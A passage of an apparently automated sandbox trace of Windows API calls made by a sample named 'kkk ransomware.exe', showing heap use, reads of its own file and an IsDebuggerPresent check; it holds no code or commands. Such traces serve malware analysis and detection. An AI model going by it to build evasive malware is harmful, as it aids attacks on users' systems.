dwHighDateTime=0x1d5dff9)) [0080.098] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cedbc | out: lpSystemTimeAsFileTime=0x8cedbc*(dwLowDateTime=0x2d54f1a2, dwHighDateTime=0x1d5dff9)) [0080.098] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4da28 [0080.098] SetFilePointer (in: hFile=0x248, lDistanceToMove=317621, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4d8b5 [0080.098] ReadFile (in: hFile=0x248, lpBuffer=0x2af7028, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8cedd0, lpOverlapped=0x0 | out: lpBuffer=0x2af7028*, lpNumberOfBytesRead=0x8cedd0*=0x200, lpOverlapped=0x0) returned 1 [0080.098] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4dab5 [0080.098] SetFilePointer (in: hFile=0x248, lDistanceToMove=333987, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x518a3 [0080.098] ReadFile (in: hFile=0x248, lpBuffer=0x2af7028, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8cedd0, lpOverlapped=0x0 | out: lpBuffer=0x2af7028*, lpNumberOfBytesRead=0x8cedd0*=0x200, lpOverlapped=0x0) returned 1 [0080.098] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cedbc | out: lpSystemTimeAsFileTime=0x8cedbc*(dwLowDateTime=0x2d54f1a2, dwHighDateTime=0x1d5dff9)) [0080.098] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cedbc | out: lpSystemTimeAsFileTime=0x8cedbc*(dwLowDateTime=0x2d54f1a2, dwHighDateTime=0x1d5dff9)) [0080.099] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cedbc | out: lpSystemTimeAsFileTime=0x8cedbc*(dwLowDateTime=0x2d54f1a2, dwHighDateTime=0x1d5dff9)) [0080.099] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51aa3 [0080.099] SetFilePointer (in: hFile=0x248, lDistanceToMove=334096, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51910 [0080.099] ReadFile (in: hFile=0x248, lpBuffer=0x2af7028, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8cedd0, lpOverlapped=0x0 | out: lpBuffer=0x2af7028*, lpNumberOfBytesRead=0x8cedd0*=0x200, lpOverlapped=0x0) returned 1 [0080.099] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b10 [0080.099] SetFilePointer (in: hFile=0x248, lDistanceToMove=576181, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8cab5 [0080.099] ReadFile (in: hFile=0x248, lpBuffer=0x2af7028, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8cedd0, lpOverlapped=0x0 | out: lpBuffer=0x2af7028*, lpNumberOfBytesRead=0x8cedd0*=0x200, lpOverlapped=0x0) returned 1 [0080.100] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cedbc | out: lpSystemTimeAsFileTime=0x8cedbc*(dwLowDateTime=0x2d54f1a2, dwHighDateTime=0x1d5dff9)) [0080.100] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cedbc | out: lpSystemTimeAsFileTime=0x8cedbc*(dwLowDateTime=0x2d54f1a2, dwHighDateTime=0x1d5dff9)) [0080.100] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cedbc | out: lpSystemTimeAsFileTime=0x8cedbc*(dwLowDateTime=0x2d54f1a2, dwHighDateTime=0x1d5dff9)) [0080.100] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8ccb5 [0080.100] SetFilePointer (in: hFile=0x248, lDistanceToMove=576310, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8cb36 [0080.100] ReadFile (in: hFile=0x248, lpBuffer=0x2af7028, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8cedd0, lpOverlapped=0x0 | out: lpBuffer=0x2af7028*, lpNumberOfBytesRead=0x8cedd0*=0x200, lpOverlapped=0x0) returned 1 [0080.100] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8cd36 [0080.101] SetFilePointer (in: hFile=0x248, lDistanceToMove=577744, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8d0d0 [0080.101] ReadFile (in: hFile=0x248, lpBuffer=0x2af7028, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8cedd0, lpOverlapped=0x0 | out: lpBuffer=0x2af7028*, lpNumberOfBytesRead=0x8cedd0*=0x8, lpOverlapped=0x0) returned 1 [0080.101] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cedbc | out: lpSystemTimeAsFileTime=0x8cedbc*(dwLowDateTime=0x2d54f1a2, dwHighDateTime=0x1d5dff9)) [0080.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af7028 | out: hHeap=0x2af0000) returned 1 [0080.101] CloseHandle (hObject=0x248) returned 1 [0080.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af6450 [0080.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af7028 [0080.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6700 [0080.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af7050 [0080.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af6348 [0080.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6800 [0080.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6348 | out: hHeap=0x2af0000) returned 1 [0080.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af7078 [0080.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af6378 [0080.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af62b8 [0080.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af7028 | out: hHeap=0x2af0000) returned 1 [0080.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6700 | out: hHeap=0x2af0000) returned 1 [0080.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6450 | out: hHeap=0x2af0000) returned 1 [0080.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af6330 [0080.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af66a0 [0080.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af62a0 [0080.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6810 [0080.102] RtlSizeHeap (HeapHandle=0x2af0000, Flags=0x0, MemoryPointer=0x2af2810) returned 0x80 [0080.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af7028 [0080.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af62e8 [0080.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af67f0 [0080.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af6390 [0080.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6330 | out: hHeap=0x2af0000) returned 1 [0080.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af66a0 | out: hHeap=0x2af0000) returned 1 [0080.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af6408 [0080.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6670 [0080.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6408 | out: hHeap=0x2af0000) returned 1 [0080.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6670 | out: hHeap=0x2af0000) returned 1 [0080.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af63f0 [0080.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af67e0 [0080.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2af70a0 [0080.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af67b0 [0080.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6720 [0080.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af6348 [0080.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af63c0 [0080.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af6228 [0080.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af67c0 [0080.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6228 | out: hHeap=0x2af0000) returned 1 [0080.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af67c0 | out: hHeap=0x2af0000) returned 1 [0080.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af63c0 | out: hHeap=0x2af0000) returned 1 [0080.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af63f0 | out: hHeap=0x2af0000) returned 1 [0080.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af67e0 | out: hHeap=0x2af0000) returned 1 [0080.102] IsDebuggerPresent () returned 0 [0080.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6c) returned 0x2af72c0 [0080.102] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe", nBufferLength=0x104, lpBuffer=0x4a7f6c, lpFilePart=0x8cf9ec | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe", lpFilePart=0x8cf9ec*="kkk ransomware.exe") returned 0x35 [0080.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af72c0 | out: hHeap=0x2af0000) returned 1 [0080.103] SHGetMalloc (in: ppMalloc=0x8cf9ec | out: ppMalloc=0x8cf9ec*=0x7732d000) returned 0x0 [0080.103] SHGetDesktopFolder (in: ppshf=0x8cf9e8 | out: ppshf=0x8cf9e8*=0x995da4) returned 0x0 [0080.110] IShellFolder:ParseDisplayName (in: This=0x995da4, hwnd=0x0, pbc=0x0, pszDisplayName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe", pchEaten=0x8cf9e0*=0x2af72c0, ppidl=0x8cf9e4, pdwAttributes=0x0 | out: pchEaten=0x8cf9e0*=0x0, ppidl=0x8cf9e4, pdwAttributes=0x0) returned 0x0 [0080.125] SHGetPathFromIDListW (in: pidl=0x997758, pszPath=0x8cf5c8 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe") returned 1 [0080.132] IMalloc:Free (This=0x7732d000, pv=0x997758) [0080.132] IUnknown:Release (This=0x995da4) returned 0x0 [0080.132] IUnknown:AddRef (This=0x7732d000) returned 0x1 [0080.132] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe", nBufferLength=0x104, lpBuffer=0x8cf7d8, lpFilePart=0x8cf9e8 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe", lpFilePart=0x8cf9e8*="kkk ransomware.exe") returned 0x35 [0080.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6c) returned 0x2af72c0 [0080.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af6270 [0080.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6630 [0080.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af63c0 [0080.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af66d0 [0080.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0080.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2af6780 [0080.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x2af6780, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 1 [0080.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6780 | out: hHeap=0x2af0000) returned 1 [0080.132] GetLastError () returned 0x0 [0080.133] SetLastError (dwErrCode=0x0) [0080.133] GetLastError () returned 0x0 [0080.133] SetLastError (dwErrCode=0x0) [0080.133] GetLastError () returned 0x0 [0080.133] SetLastError (dwErrCode=0x0) [0080.133] GetLastError () returned 0x0 [0080.133] SetLastError (dwErrCode=0x0) [0080.133] GetLastError () returned 0x0 [0080.133] SetLastError (dwErrCode=0x0) [0080.133] GetLastError () returned 0x0 [0080.133] SetLastError (dwErrCode=0x0) [0080.133] GetLastError () returned 0x0 [0080.133] SetLastError (dwErrCode=0x0) [0080.133] GetLastError () returned 0x0 [0080.133] SetLastError (dwErrCode=0x0) [0080.133] GetLastError () returned 0x0 [0080.133] SetLastError (dwErrCode=0x0) [0080.133] GetLastError () returned 0x0 [0080.133] SetLastError (dwErrCode=0x0) [0080.133] GetLastError () returned 0x0 [0080.133] SetLastError (dwErrCode=0x0) [0080.133] GetLastError () returned 0x0 [0080.133] SetLastError (dwErrCode=0x0) [0080.133] GetLastError () returned 0x0 [0080.133] SetLastError (dwErrCode=0x0) [0080.134] GetLastError () returned 0x0 [0080.134] SetLastError (dwErrCode=0x0) [0080.134] GetLastError () returned 0x0 [0080.134] SetLastError (dwErrCode=0x0) [0080.134] GetLastError () returned 0x0 [0080.134] SetLastError (dwErrCode=0x0) [0080.134] GetLastError () returned 0x0 [0080.134] SetLastError (dwErrCode=0x0) [0080.134] GetLastError () returned 0x0 [0080.134] SetLastError (dwErrCode=0x0) [0080.134] GetLastError () returned 0x0 [0080.134] SetLastError (dwErrCode=0x0) [0080.134] GetLastError () returned 0x0 [0080.134] SetLastError (dwErrCode=0x0) [0080.134] GetLastError () returned 0x0 [0080.134] SetLastError (dwErrCode=0x0) [0080.134] GetLastError () returned 0x0 [0080.134] SetLastError (dwErrCode=0x0) [0080.134] GetLastError () returned 0x0 [0080.134] SetLastError (dwErrCode=0x0) [0080.134] GetLastError () returned 0x0 [0080.134] SetLastError (dwErrCode=0x0) [0080.134] GetLastError () returned 0x0 [0080.134] SetLastError (dwErrCode=0x0) [0080.134] GetLastError () returned 0x0 [0080.135] SetLastError (dwErrCode=0x0) [0080.135] GetLastError () returned 0x0 [0080.135] SetLastError (dwErrCode=0x0) [0080.135] GetLastError () returned 0x0 [0080.135] SetLastError (dwErrCode=0x0) [0080.135] GetLastError () returned 0x0 [0080.135] SetLastError (dwErrCode=0x0) [0080.135] GetLastError () returned 0x0 [0080.135] SetLastError (dwErrCode=0x0) [0080.135] GetLastError () returned 0x0 [0080.135] SetLastError (dwErrCode=0x0) [0080.135] GetLastError () returned 0x0 [0080.135] SetLastError (dwErrCode=0x0) [0080.135] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\kkk ransomware.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x8cf674, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x274 [0080.135] GetFileType (hFile=0x274) returned 0x1 [0080.135] ReadFile (in: hFile=0x274, lpBuffer=0x8bf78c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf678, lpOverlapped=0x0 | out: lpBuffer=0x8bf78c*, lpNumberOfBytesRead=0x8bf678*=0x10000, lpOverlapped=0x0) returned 1 [0080.136] SetFilePointer (in: hFile=0x274, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10000 [0080.136] SetFilePointer (in: hFile=0x274, lDistanceToMove=65516, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffec [0080.136] ReadFile (in: hFile=0x274, lpBuffer=0x8bf78c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf678, lpOverlapped=0x0 | out: lpBuffer=0x8bf78c*, lpNumberOfBytesRead=0x8bf678*=0x10000, lpOverlapped=0x0) returned 1 [0080.136] SetFilePointer (in: hFile=0x274, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1ffec [0080.136] SetFilePointer (in: hFile=0x274, lDistanceToMove=131032, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1ffd8 [0080.136] ReadFile (in: hFile=0x274, lpBuffer=0x8bf78c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf678, lpOverlapped=0x0 | out: lpBuffer=0x8bf78c*, lpNumberOfBytesRead=0x8bf678*=0x10000, lpOverlapped=0x0) returned 1 [0080.136] SetFilePointer (in: hFile=0x274, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ffd8 [0080.136] SetFilePointer (in: hFile=0x274, lDistanceToMove=196548, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2ffc4 [0080.137] ReadFile (in: hFile=0x274, lpBuffer=0x8bf78c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf678, lpOverlapped=0x0 | out: lpBuffer=0x8bf78c*, lpNumberOfBytesRead=0x8bf678*=0x10000, lpOverlapped=0x0) returned 1 [0080.137] SetFilePointer (in: hFile=0x274, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3ffc4 [0080.137] SetFilePointer (in: hFile=0x274, lDistanceToMove=262064, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3ffb0 [0080.137] ReadFile (in: hFile=0x274, lpBuffer=0x8bf78c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf678, lpOverlapped=0x0 | out: lpBuffer=0x8bf78c*, lpNumberOfBytesRead=0x8bf678*=0x10000, lpOverlapped=0x0) returned 1 [0080.137] SetFilePointer (in: hFile=0x274, lDistanceToMove=317460, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4d814 [0080.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1000) returned 0x2af7338 [0080.137] ReadFile (in: hFile=0x274, lpBuffer=0x2af7338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8bf65c, lpOverlapped=0x0 | out: lpBuffer=0x2af7338*, lpNumberOfBytesRead=0x8bf65c*=0x1000, lpOverlapped=0x0) returned 1 [0080.137] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cf68c | out: lpSystemTimeAsFileTime=0x8cf68c*(dwLowDateTime=0x2d59b67a, dwHighDateTime=0x1d5dff9)) [0080.137] SetFilePointer (in: hFile=0x274, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e814 [0080.139] SetFilePointer (in: hFile=0x274, lDistanceToMove=317480, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4d828 [0080.226] ReadFile (in: hFile=0x274, lpBuffer=0x2af7338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8ced68, lpOverlapped=0x0 | out: lpBuffer=0x2af7338*, lpNumberOfBytesRead=0x8ced68*=0x200, lpOverlapped=0x0) returned 1 [0080.226] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ced54 | out: lpSystemTimeAsFileTime=0x8ced54*(dwLowDateTime=0x2d68047b, dwHighDateTime=0x1d5dff9)) [0080.226] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ced54 | out: lpSystemTimeAsFileTime=0x8ced54*(dwLowDateTime=0x2d68047b, dwHighDateTime=0x1d5dff9)) [0080.226] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ced54 | out: lpSystemTimeAsFileTime=0x8ced54*(dwLowDateTime=0x2d68047b, dwHighDateTime=0x1d5dff9)) [0080.226] SetFilePointer (in: hFile=0x274, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4da28 [0080.226] SetFilePointer (in: hFile=0x274, lDistanceToMove=317649, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4d8d1 [0080.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x141dc) returned 0x29e0048 [0080.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3fd2) returned 0x2af8340 [0080.227] ReadFile (in: hFile=0x274, lpBuffer=0x2af8340, nNumberOfBytesToRead=0x3e00, lpNumberOfBytesRead=0x8cf1c8, lpOverlapped=0x0 | out: lpBuffer=0x2af8340*, lpNumberOfBytesRead=0x8cf1c8*=0x3e00, lpOverlapped=0x0) returned 1 [0080.228] ReadFile (in: hFile=0x274, lpBuffer=0x2af7338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8cf1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af7338*, lpNumberOfBytesRead=0x8cf1b8*=0x200, lpOverlapped=0x0) returned 1 [0080.228] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cf1a4 | out: lpSystemTimeAsFileTime=0x8cf1a4*(dwLowDateTime=0x2d68047b, dwHighDateTime=0x1d5dff9)) [0080.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20000) returned 0x29f4230 [0080.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a14238 [0080.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a24240 [0080.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f4230 | out: hHeap=0x2af0000) returned 1 [0080.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a14238 | out: hHeap=0x2af0000) returned 1 [0080.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a24240 | out: hHeap=0x2af0000) returned 1 [0080.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af8340 | out: hHeap=0x2af0000) returned 1 [0080.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1d64) returned 0x2af8340 [0080.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x2af0588 [0080.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af62d0 [0080.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2af6510 [0080.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af6228 [0080.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2af6468 [0080.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6510 | out: hHeap=0x2af0000) returned 1 [0080.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6) returned 0x2af6730 [0080.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af6480 [0080.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af67d0 [0080.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6480 | out: hHeap=0x2af0000) returned 1 [0080.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af67d0 | out: hHeap=0x2af0000) returned 1 [0080.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6730 | out: hHeap=0x2af0000) returned 1 [0080.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2af6510 [0080.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2af66e0 [0080.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af64c8 [0080.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6640 [0080.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af64c8 | out: hHeap=0x2af0000) returned 1 [0080.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6640 | out: hHeap=0x2af0000) returned 1 [0080.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af66e0 | out: hHeap=0x2af0000) returned 1 [0080.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2af6330 [0080.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x2af0588 [0080.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2afa0b0 [0080.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af67d0 [0080.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afa0b0 | out: hHeap=0x2af0000) returned 1 [0080.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af67d0 | out: hHeap=0x2af0000) returned 1 [0080.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2af6498 [0080.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2af63d8 [0080.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6) returned 0x2af67c0 [0080.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af63f0 [0080.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af6360 [0080.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6730 [0080.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af67c0 | out: hHeap=0x2af0000) returned 1 [0080.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2afa0b0 [0080.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af62d0 | out: hHeap=0x2af0000) returned 1 [0080.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2af6408 [0080.267] RtlAllocateHeap 